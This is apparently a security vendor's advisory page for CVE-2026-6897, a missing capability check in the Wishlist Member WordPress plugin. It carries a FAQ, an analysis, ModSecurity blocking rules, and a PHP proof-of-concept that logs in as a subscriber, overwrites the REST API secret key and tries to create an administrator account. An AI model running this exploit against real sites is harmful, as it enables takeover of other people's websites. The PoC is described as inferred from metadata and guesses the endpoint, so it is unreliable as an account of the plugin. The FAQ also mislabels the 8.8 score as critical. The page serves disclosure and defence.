What is CVE-2026-6897?

CVE-2026-6897 is a security vulnerability in the Wishlist Member plugin for WordPress, affecting versions up to and including 3.30.1. It allows authenticated users with Subscriber-level access and above to update arbitrary plugin options due to a missing capability check in the ‘save_settings’ function.

How does this vulnerability work?

The vulnerability arises from a lack of authorization checks in the AJAX action ‘wishlistmember_team_accounts_save_settings’. Attackers can send a POST request to update settings, including critical options like the REST API Secret Key, enabling them to create new administrator accounts.

Who is affected by this vulnerability?

Any WordPress site using the Wishlist Member plugin version 3.30.1 or earlier is vulnerable. This includes sites where authenticated users have Subscriber-level access, allowing them to exploit the vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Wishlist Member plugin installed. If it is version 3.30.1 or earlier, your site is at risk and should be updated immediately.

What is the severity of CVE-2026-6897?

The CVSS score for this vulnerability is 8.8, classified as High severity. This indicates a significant risk, as it allows for complete site takeover by authenticated attackers.

What does a CVSS score of 8.8 mean?

A CVSS score of 8.8 signifies a critical vulnerability that can lead to severe consequences, including unauthorized access and control over the affected WordPress site. It indicates that immediate action is necessary.

How can I fix or mitigate this issue?

To remediate this vulnerability, update the Wishlist Member plugin to the latest version that addresses the issue. Additionally, implement capability checks in the ‘save_settings’ function to restrict access to authorized users only.

What should I do if I cannot immediately update the plugin?

If an immediate update is not possible, consider disabling the Wishlist Member plugin until a patch is applied. Additionally, review user roles and limit access to authenticated users with lower privileges.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can log in as a Subscriber and send a crafted request to exploit the vulnerability. It shows the steps to modify critical plugin settings, leading to potential site takeover.

What are the implications of a successful exploit?

If successfully exploited, an attacker can create a new administrator account, gaining full control over the WordPress site. This could lead to data loss, unauthorized changes, and other security breaches.

Are there any other security measures I should take?

In addition to updating plugins, ensure that your WordPress installation is regularly updated, implement strong user authentication practices, and consider using security plugins that monitor for unauthorized changes.

Where can I find more information about this vulnerability?

For more details, you can refer to the official CVE database, security advisories from the plugin developer, and trusted security blogs that analyze vulnerabilities in WordPress plugins.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 22, 2026

CVE-2026-6897: Wishlist Member <= 3.30.1 – Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Options Update via 'wishlistmember_team_accounts_save_settings' AJAX action (wishlist-member-x)

CVE ID CVE-2026-6897

Plugin wishlist-member-x

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 3.30.1

Patched Version —

Disclosed May 21, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6897 (metadata-based): This vulnerability in Wishlist Member (up to 3.30.1) allows authenticated attackers with Subscriber-level access to update arbitrary plugin options via the ‘wishlistmember_team_accounts_save_settings’ AJAX action. The CVSS score is 8.8 (High), and the CWE classification is 269 (Improper Privilege Management).

The root cause is a missing capability check on the ‘WishListMemberFeaturesTeam_Accounts::save_settings’ function. Atomic Edge analysis infers that the function is registered as a WordPress AJAX handler (likely via ‘wp_ajax_’ and ‘wp_ajax_nopriv_’ hooks for authenticated users) but does not call ‘current_user_can()’ or a similar capability verification before processing the request. This is confirmed by the CWE and the description stating a missing capability check. The function likely accepts an array of settings parameters and saves them directly to the plugin’s options table, without filtering which options can be modified.

Exploitation requires only a Subscriber-level account. An attacker sends a POST request to ‘/wp-admin/admin-ajax.php’ with the action parameter set to ‘wishlistmember_team_accounts_save_settings’ and includes arbitrary plugin options in the request body. A critical target is the ‘wlm_rest_api_secret_key’ option, which controls REST API authentication. By overwriting this key, the attacker can use the REST API to create a new membership level with Administrator role privileges and register a new administrator user. The specific parameters for the REST API key update would likely be something like ‘settings[wlm_rest_api_secret_key]=new_value’.

Remediation requires adding a capability check (e.g., ‘current_user_can(‘manage_options’)’) to the ‘save_settings’ function before any data is processed. The function should also validate that the submitted settings array contains only allowed keys, using a whitelist approach. Without code access, Atomic Edge analysis recommends the plugin maintainer verify that the function implements proper nonce verification and input sanitization as well.

The impact is complete site takeover. An attacker can create an administrator account, gain full control of the WordPress installation, and execute arbitrary code through plugin/theme editing, file uploads, or direct database access. This affects all sites using Wishlist Member 3.30.1 or earlier without a patch available.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6897 (metadata-based)
# Block exploitation attempts via AJAX action with arbitrary settings parameter
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20268971,phase:2,deny,status:403,chain,msg:'CVE-2026-6897 exploitation via wishlistmember_team_accounts_save_settings AJAX action',severity:'CRITICAL',tag:'CVE-2026-6897'"
  SecRule ARGS_POST:action "@streq wishlistmember_team_accounts_save_settings" 
    "chain"
    SecRule ARGS_POST:settings.wlm_rest_api_secret_key "@rx .+" 
      "t:none"

# Second rule to block arbitrary option updates via settings array
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20268972,phase:2,deny,status:403,chain,msg:'CVE-2026-6897 exploitation via arbitrary plugin option update',severity:'CRITICAL',tag:'CVE-2026-6897'"
  SecRule ARGS_POST:action "@streq wishlistmember_team_accounts_save_settings" 
    "chain"
    SecRule ARGS_POST:settings "@rx [sS]+" 
      "t:none"

# Third rule to block REST API key manipulation via POST body
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20268973,phase:2,deny,status:403,chain,msg:'CVE-2026-6897 exploitation via direct parameter injection',severity:'CRITICAL',tag:'CVE-2026-6897'"
  SecRule ARGS_POST:action "@streq wishlistmember_team_accounts_save_settings" 
    "chain"
    SecRule REQUEST_BODY "@rx wlm_rest_api_secret_key" 
      "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6897 - Wishlist Member <= 3.30.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Options Update via 'wishlistmember_team_accounts_save_settings' AJAX action

// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress URL
$username = 'subscriber_user';      // Valid subscriber-level username
$password = 'subscriber_pass';      // Valid subscriber-level password

// Login to WordPress to get authentication cookies
echo "[+] Logging in as $username...n";
$login_url = $target_url . '/wp-login.php';
$login_data = [
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

if (preg_match('/wordpress_logged_in_/', $response)) {
    echo "[+] Login successful.n";
} else {
    die("[-] Login failed. Check credentials or target URL.n");
}

// Step 1: Update the REST API Secret Key to a known value
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
echo "[+] Sending malicious AJAX request to update REST API secret key...n";

$payload = [
    'action' => 'wishlistmember_team_accounts_save_settings',
    'settings' => [
        'wlm_rest_api_secret_key' => 'arbitrary_secret_key_12345'
    ]
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
$response = curl_exec($ch);

echo "[+] Response: $responsen";

// Step 2: Use the REST API with the new secret key to create an admin user
// This step assumes the Wishlist Member REST API endpoint structure.
// Adjust the endpoint and parameters based on the actual plugin API.
echo "[+] Attempting to create admin user via REST API...n";

$rest_url = $target_url . '/wp-json/wishlist-member/v1/register';
$rest_payload = json_encode([
    'username' => 'evil_admin',
    'password' => 'EvilPass123!',
    'email' => 'evil@example.com',
    'membership_level' => 'new_admin_level', // Must be created first or use existing level ID
    'role' => 'administrator'
]);

curl_setopt($ch, CURLOPT_URL, $rest_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $rest_payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WLM-REST-API-Secret: arbitrary_secret_key_12345'
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);

echo "[+] REST API response: $responsen";

curl_close($ch);

echo "[+] Exploit attempt completed. Check if evil_admin user was created.n";
?>

Frequently Asked Questions

What is CVE-2026-6897?
Overview of the vulnerability
CVE-2026-6897 is a security vulnerability in the Wishlist Member plugin for WordPress, affecting versions up to and including 3.30.1. It allows authenticated users with Subscriber-level access and above to update arbitrary plugin options due to a missing capability check in the ‘save_settings’ function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a lack of authorization checks in the AJAX action ‘wishlistmember_team_accounts_save_settings’. Attackers can send a POST request to update settings, including critical options like the REST API Secret Key, enabling them to create new administrator accounts.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Wishlist Member plugin version 3.30.1 or earlier is vulnerable. This includes sites where authenticated users have Subscriber-level access, allowing them to exploit the vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Wishlist Member plugin installed. If it is version 3.30.1 or earlier, your site is at risk and should be updated immediately.
What is the severity of CVE-2026-6897?
Understanding the risk level
The CVSS score for this vulnerability is 8.8, classified as High severity. This indicates a significant risk, as it allows for complete site takeover by authenticated attackers.
What does a CVSS score of 8.8 mean?
Interpreting the CVSS score
A CVSS score of 8.8 signifies a critical vulnerability that can lead to severe consequences, including unauthorized access and control over the affected WordPress site. It indicates that immediate action is necessary.
How can I fix or mitigate this issue?
Recommended actions
To remediate this vulnerability, update the Wishlist Member plugin to the latest version that addresses the issue. Additionally, implement capability checks in the ‘save_settings’ function to restrict access to authorized users only.
What should I do if I cannot immediately update the plugin?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the Wishlist Member plugin until a patch is applied. Additionally, review user roles and limit access to authenticated users with lower privileges.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can log in as a Subscriber and send a crafted request to exploit the vulnerability. It shows the steps to modify critical plugin settings, leading to potential site takeover.
What are the implications of a successful exploit?
Consequences of the vulnerability
If successfully exploited, an attacker can create a new administrator account, gaining full control over the WordPress site. This could lead to data loss, unauthorized changes, and other security breaches.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating plugins, ensure that your WordPress installation is regularly updated, implement strong user authentication practices, and consider using security plugins that monitor for unauthorized changes.
Where can I find more information about this vulnerability?
Resources for further reading
For more details, you can refer to the official CVE database, security advisories from the plugin developer, and trusted security blogs that analyze vulnerabilities in WordPress plugins.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations